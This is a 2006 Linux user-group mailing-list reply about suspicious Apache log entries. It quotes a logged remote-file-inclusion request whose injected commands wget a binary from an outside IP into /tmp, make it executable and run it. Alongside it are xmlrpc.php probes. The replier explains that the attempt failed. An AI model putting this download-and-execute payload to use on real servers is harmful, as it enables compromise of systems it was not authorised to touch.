[NTLUG:Discuss] weird apache log info.
Stuart Johnston
saj at thecommune.net
Mon Jun 5 14:53:10 CDT 2006
m m wrote:
> All:
>
> Can any Apache expert explain these 3 line of log for me?
> Has the server been hacked?
> Thanks.
>
> 124.12.176.23 - - [05/Jun/2006:12:30:46 -0500] "GET
> /cvs/index2.php?_REQUEST[optio
> n]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://72.18.
>
> 195.161/cmd.gif?&cmd=cd%20/tmp;wget%2072.18.195.161/lnikon;chmod%20744%20lnikon;
>
> ../lnikon;echo%20YYY;echo| HTTP/1.1" 404 294 "-" "Mozilla/4.0
> (compatible; MSIE
> 6.0; Windows NT 5.1;)"
>
> 124.12.176.23 - - [05/Jun/2006:12:30:50 -0500] "POST /xmlrpc.php
> HTTP/1.1" 404 290
> "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
>
> 124.12.176.23 - - [05/Jun/2006:12:30:51 -0500] "POST /blog/xmlrpc.php
> HTTP/1.1" 40
> 4 295 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
Someone was trying to hack your server but based on the 404s, they were
not successful.
More information about the Discuss
mailing list